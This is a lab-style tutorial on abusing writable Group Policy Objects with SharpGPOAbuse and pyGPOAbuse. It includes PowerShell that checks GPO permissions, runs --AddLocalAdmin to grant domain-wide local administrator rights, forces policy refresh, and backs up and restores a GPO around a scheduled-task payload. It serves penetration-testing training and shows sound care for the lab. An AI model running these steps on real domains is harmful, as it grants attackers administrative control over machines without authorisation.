GPO Attacks
We discussed the theory behind GPOs here.
To abuse GPOs from Windows we mainly use SharpGPOAbuse. It needs an account that already has write access to the target GPO (GpoEdit or GpoEditDeleteModifySecurity on the GPO) and it modifies an existing GPO rather than creating one. The main options:
| Option | Description |
|---|---|
| --AddUserRights | Add user rights (privileges) to a user |
| --AddLocalAdmin | Add a user to the local Administrators group |
| --AddComputerScript | Add a new computer startup script |
| --AddUserScript | Configure a user logon script |
| --AddComputerTask | Configure a computer immediate scheduled task |
| --AddUserTask | Add an immediate scheduled task to a user |
For example, we can use --AddLocalAdmin to grant a user local administrative access on every computer the GPO applies to.
[!info]
The --AddLocalAdmin option works through Restricted Groups, which sets (rather than appends to) the membership of the local Administrators group. If this policy wins precedence, any existing local Administrators membership on the affected machines is replaced, so accounts that were added locally, or by a lower-priority GPO, are removed. It is recommended to experiment with these changes in a controlled environment, such as this lab.
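The --AddLocalAdmin workflow with the checks a practitioner would run around it, as an added example (this is not code from the page or from the SharpGPOAbuse project). It assumes the GroupPolicy module from RSAT/GPMC is available, that SharpGPOAbuse.exe sits in the current directory, and that the GPO name, user name and target host below are placeholders:

```powershell
# Added example, not from the original page or the SharpGPOAbuse project.
# Assumes the GroupPolicy module (RSAT/GPMC) is loaded and SharpGPOAbuse.exe
# is in the current directory. GPO, user and host names are placeholders.
$GpoName     = 'Default Domain Policy'   # assumed target GPO we can write to
$UserAccount = 'bob'                     # assumed account to elevate
$TargetHost  = 'ws01'                    # assumed computer the GPO is linked to
$Domain      = $env:USERDNSDOMAIN

# 1. Confirm we hold a write-capable permission on the GPO; without it the
#    tool fails when it tries to update the GPC (AD object) and GPT (SYSVOL).
$gpo   = Get-GPO -Name $GpoName
$perms = Get-GPPermission -Guid $gpo.Id -All |
         Where-Object { $_.Permission -in 'GpoEdit', 'GpoEditDeleteModifySecurity' }
$perms | Format-Table Trustee, Permission -AutoSize

# 2. Record where the GPO is linked, so we know which hosts will apply it.
$report = [xml](Get-GPOReport -Guid $gpo.Id -ReportType Xml)
$report.GPO.LinksTo | Select-Object SOMName, SOMPath, Enabled

# 3. Look for an existing Restricted Groups entry in the GPT. AddLocalAdmin
#    writes a [Group Membership] section for S-1-5-32-544 (Administrators);
#    if one is already there the tool refuses unless --Force is given, and the
#    resulting membership replaces what the linked hosts currently have.
$gptTmpl = "\\$Domain\SYSVOL\$Domain\Policies\{$($gpo.Id)}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
if (Test-Path $gptTmpl) {
    Select-String -Path $gptTmpl -Pattern 'Group Membership', 'S-1-5-32-544'
}

# 4. Abuse the GPO.
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount $UserAccount --GPOName $GpoName

# 5. Policy refresh on clients is every 90 minutes plus a random offset, so
#    force it on the target and confirm the new member.
Invoke-Command -ComputerName $TargetHost -ScriptBlock { gpupdate /force }
Invoke-Command -ComputerName $TargetHost -ScriptBlock { Get-LocalGroupMember -Group 'Administrators' }
```

Step 3 is the check that matters for the warning above: if GptTmpl.inf already carries a Group Membership section, the abuse replaces the Administrators membership on every linked host rather than adding to it.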
To abuse GPOs from Linux we use pyGPOAbuse.
Before we abuse this GPO, let's create a backup so we can restore it once we are done.
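The backup-and-restore step around the abuse, as an added example (not code from the page or from pyGPOAbuse). The page does not say where the backup is taken; this assumes a Windows host with the GroupPolicy module from RSAT/GPMC and an account with read access to the GPO, with the GPO name and backup path as placeholders. The pyGPOAbuse modification itself is run from Linux in between the two halves:

```powershell
# Added example, not from the original page or from pyGPOAbuse. Assumes the
# GroupPolicy module (RSAT/GPMC) is loaded; GPO name and path are placeholders.
$GpoName    = 'Default Domain Policy'   # assumed GPO that will be abused
$BackupPath = 'C:\GPOBackup'            # assumed local backup directory
$Domain     = $env:USERDNSDOMAIN

New-Item -ItemType Directory -Path $BackupPath -Force | Out-Null

# 1. Snapshot the GPO before touching it. Keep the backup Id: Restore-GPO needs
#    it (or the GPO name) together with the path.
$backup = Backup-GPO -Name $GpoName -Path $BackupPath -Comment 'pre-abuse snapshot'
$backup | Select-Object DisplayName, GpoId, Id, CreationTime

# Version counters before the change; every write bumps them on the GPC (DS)
# and in SYSVOL, and clients only reapply when the version moves.
$gpo = Get-GPO -Name $GpoName
"Before: DS={0} SYSVOL={1}" -f $gpo.Computer.DSVersion, $gpo.Computer.SysvolVersion

# --- run pyGPOAbuse from the Linux host here ---

# 2. Check what changed. An immediate computer task lands as ScheduledTasks.xml
#    under the GPT's Machine\Preferences\ScheduledTasks folder.
$gpo = Get-GPO -Name $GpoName
"After:  DS={0} SYSVOL={1}" -f $gpo.Computer.DSVersion, $gpo.Computer.SysvolVersion
$tasksDir = "\\$Domain\SYSVOL\$Domain\Policies\{$($gpo.Id)}\Machine\Preferences\ScheduledTasks"
Get-ChildItem $tasksDir -ErrorAction SilentlyContinue

# 3. Restore the snapshot once finished and confirm the task is gone.
Restore-GPO -BackupId $backup.Id -Path $BackupPath
Get-ChildItem $tasksDir -ErrorAction SilentlyContinue
```

Restoring the GPO puts the policy back; it does not undo what the immediate task already did on the clients that applied it (for example a user that was added to the local Administrators group), so that cleanup has to be done separately.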
Next we can modify the GPO. pyGPOAbuse adds an immediate scheduled task to it; the command to run is passed with -command and executes through cmd, and adding the -powershell flag runs it through PowerShell instead.